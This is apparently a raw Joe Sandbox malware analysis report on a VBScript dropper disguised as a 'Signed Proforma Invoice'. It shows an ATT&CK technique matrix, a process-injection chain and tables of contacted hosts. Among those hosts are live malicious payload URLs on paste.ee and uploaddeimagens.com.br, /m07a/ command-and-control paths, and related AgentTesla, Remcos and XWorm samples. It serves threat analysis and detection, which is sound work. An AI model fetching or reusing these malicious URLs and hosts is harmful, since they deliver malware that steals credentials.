            Source: C:\Windows\SysWOW64\colorcpl.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Shared Modules | 221 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 712 Process Injection | 4 Obfuscated Files or Information | 1 Credential API Hooking | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Software Packing | Security Account Manager | 114 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 121 Security Software Discovery | Distributed Component Object Model | 1 Credential API Hooking | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | Network Logon Script | 1 Rootkit | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 712 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            [Behavior graph: ID 1428347; sample: Signed Proforma Invoice 364...; start date: 18/04/2024; architecture: WINDOWS; score: 100. Process chain: wscript.exe -> powershell.exe -> powershell.exe -> MSBuild.exe (two instances) -> explorer.exe (injected) -> colorcpl.exe -> cmd.exe, firefox.exe]

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | Signed Proforma Invoice 3645479_pdf.vbs | 8% | ReversingLabs | Win32.Dropper.Generic | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | http://crl.microsoft | 0% | URL Reputation | safe | |
            | https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe | |
            | https://mozilla.org0/ | 0% | URL Reputation | safe | |
            | http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware | |
            | http://schemas.micr | 0% | URL Reputation | safe | |
            | https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe | |
            | https://outlook.com_ | 0% | URL Reputation | safe | |
            | http://schemas.mi | 0% | URL Reputation | safe | |
            | https://powerpoint.office.comcember | 0% | URL Reputation | safe | |
            | http://schemas.micro | 0% | URL Reputation | safe | |
            | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|---|---|
            | lunazone.us | 3.33.130.190 | true | true | | unknown |
            | dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | | unknown |
            | bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown |
            | www.msaway.com | 217.160.0.95 | true | true | | unknown |
            | paste.ee | 172.67.187.200 | true | false | | high |
            | uploaddeimagens.com.br | 104.21.45.138 | true | true | | unknown |
            | www.xasvcd.xyz | 203.161.57.217 | true | true | | unknown |
            | fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown |
            | www.lunazone.us | unknown | unknown | true | | unknown |
            | onedrive.live.com | unknown | unknown | false | | high |
            | htdgia.db.files.1drv.com | unknown | unknown | false | | high |
            | www.shakishaskakes.com | unknown | unknown | true | | unknown |
            | Name | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|
            | www.lunazone.us/m07a/ | true | | low |
            | https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820 | true | | unknown |
            | http://www.msaway.com/m07a/ | true | | unknown |
            | http://www.xasvcd.xyz/m07a/ | true | | unknown |
                                                                                                                    high
                                                                                                                    https://paste.ee/d/K2No9qShwscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://wns.windows.com/Lexplorer.exe, 00000006.00000000.1815748916.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://word.office.comexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://mozilla.org0/colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                          • URL Reputation: malware
                                                                                                                          unknown
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.google.com;wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  low
                                                                                                                                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.micrexplorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.potentpolitics.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.qdaoxingsujiao.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.potentpolitics.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lesferch.github.io/DesktopPicwscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, Signed Proforma Invoice 3645479_pdf.vbsfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://uploaddeimagens.com.brpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          unknown
                                                                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.nacob.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://analytics.paste.ee;wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                low
                                                                                                                                                                https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://outlook.com_explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                low
                                                                                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.lunazone.us/m07a/www.balancceer.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.apexu.xyz/m07a/www.nacob.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.workproapi.site/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://schemas.miexplorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://powerpoint.office.comcemberexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.royal-buttons.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.yipaijihejiaoyu.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://analytics.paste.eewscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://aka.ms/pscore6powershell.exe, 00000001.00000002.2217742539.000001DC3FFDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.microexplorer.exe, 00000006.00000002.2940547809.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2936778344.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1801712063.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.qdaoxingsujiao.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.yipaijihejiaoyu.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.apexu.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.yipaijihejiaoyu.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://www.propertiesfinance.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.auralights.store/m07a/www.potentpolitics.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
http://www.matchuplover.comReferer: | explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp | false | unknown
http://www.xasvcd.xyzReferer: | explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp | false | unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | high
http://www.qdaoxingsujiao.com/m07a/ | explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp | false | unknown
https://api.msn.com/q | explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | high
https://paste.ee/ | wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671154482.000001D664BF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmp | false | high
https://paste.ee/d/K2No95 | wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmp | false | high
http://www.nacob.top/m07a/www.matchuplover.com | explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp | false | unknown
http://www.royal-buttons.com/m07a/ | explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp | false | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.187.200 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.21.45.138 | uploaddeimagens.com.br | United States | 13335 | CLOUDFLARENETUS | true
203.161.57.217 | www.xasvcd.xyz | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
3.33.130.190 | lunazone.us | United States | 8987 | AMAZONEXPANSIONGB | true
217.160.0.95 | www.msaway.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                        Analysis ID:1428347
                                                                                                                                                                                                                        Start date and time:2024-04-18 21:10:22 +02:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 8m 55s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:15
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:Signed Proforma Invoice 3645479_pdf.vbs
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winVBS@17/11@8/6
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 75%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 49
                                                                                                                                                                                                                        • Number of non-executed functions: 295
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .vbs
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.42.12, 40.127.169.103, 199.232.210.172, 192.229.211.108, 13.85.23.206, 20.242.39.171
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, l-0003.l-msedge.net, ocsp.digicert.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, odc-db-files-geo.onedrive.akadns.net, sls.update.microsoft.com, odc-db-files-brs.onedrive.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6236 because it is empty
                                                                                                                                                                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • VT rate limit hit for: Signed Proforma Invoice 3645479_pdf.vbs
Time | Type | Description
21:11:16 | API Interceptor | 40x Sleep call for process: powershell.exe modified
21:11:53 | API Interceptor | 695x Sleep call for process: explorer.exe modified
21:12:14 | API Interceptor | 2276462x Sleep call for process: colorcpl.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.187.200 | EWW.vbs | malicious | Unknown | paste.ee/d/gFlKP
172.67.187.200 | ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx | malicious | Unknown | paste.ee/d/JxxYu
172.67.187.200 | Purchase Order PO0193832.vbs | malicious | Unknown | paste.ee/d/Bpplq
172.67.187.200 | Name.vbs | malicious | Unknown | paste.ee/d/0kkOm
172.67.187.200 | 517209487.vbs | malicious | XWorm | paste.ee/d/s0kJG
172.67.187.200 | screen_shots.vbs | malicious | XWorm | paste.ee/d/GoCAw
172.67.187.200 | 66432890.vbs | malicious | Unknown | paste.ee/d/D6Uw6
172.67.187.200 | 96874650.vbs | malicious | XWorm | paste.ee/d/yj4hE
172.67.187.200 | 1e#U041e.vbs | malicious | AgentTesla | paste.ee/d/QkK2f
172.67.187.200 | 751652433.vbs | malicious | XWorm | paste.ee/d/0BSaJ
13.107.139.11 | ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | 20240416-703661.cmd | malicious | DBatLoader |
13.107.139.11 | 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | Oeyrmdo.exe | malicious | AgentTesla, PureLog Stealer |
13.107.139.11 | z15ORDERBR2024-B001054840.vbs | malicious | Unknown |
13.107.139.11 | FT-3-TL-BALANCE,jpg.cmd | malicious | DBatLoader |
13.107.139.11 | PO3488-0337.bat | malicious | Remcos, DBatLoader |
13.107.139.11 | https://1drv.ms/f/s!Ah3RUujFpGTrbZcZBXk_HMFtmRQ | malicious | Unknown |
13.107.139.11 | CONFIRMATION ORDER0.bat | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
104.21.45.138 | F723838674.vbs | malicious | Remcos |
104.21.45.138 | DHL Receipt_pdf.vbs | malicious | AgentTesla |
104.21.45.138 | Remittance slip.vbs | malicious | Unknown |
104.21.45.138 | SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf | malicious | Remcos |
104.21.45.138 | F873635427.vbs | malicious | Remcos, XWorm |
104.21.45.138 | F873635427.vbs | malicious | Remcos, XWorm |
104.21.45.138 | Price Quotation_pdf.vbs | malicious | AgentTesla |
104.21.45.138 | 5FU4LRpQdy.rtf | malicious | Remcos |
104.21.45.138 | yDOZ8nTvm8.rtf | malicious | AgentTesla |
104.21.45.138 | DETAILS.docx.doc | malicious | Remcos |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| paste.ee | F723838674.vbs | malicious | Remcos | 104.21.84.67 |
| | DHL Receipt_pdf.vbs | malicious | AgentTesla | 104.21.84.67 |
| | Remittance slip.vbs | malicious | Unknown | 104.21.84.67 |
| | SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf | malicious | Remcos | 104.21.84.67 |
| | F873635427.vbs | malicious | Remcos, XWorm | 172.67.187.200 |
| | F873635427.vbs | malicious | Remcos, XWorm | 172.67.187.200 |
| | Payment Advice for Invoice 2024 0904.vbs | malicious | FormBook | 172.67.187.200 |
| | Price Quotation_pdf.vbs | malicious | AgentTesla | 104.21.84.67 |
| | 5FU4LRpQdy.rtf | malicious | Remcos | 172.67.187.200 |
| | yDOZ8nTvm8.rtf | malicious | AgentTesla | 172.67.187.200 |
| dual-spov-0006.spov-msedge.net | ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11 |
| | RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.137.11 |
| | 20240416-703661.cmd | malicious | DBatLoader | 13.107.139.11 |
| | 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11 |
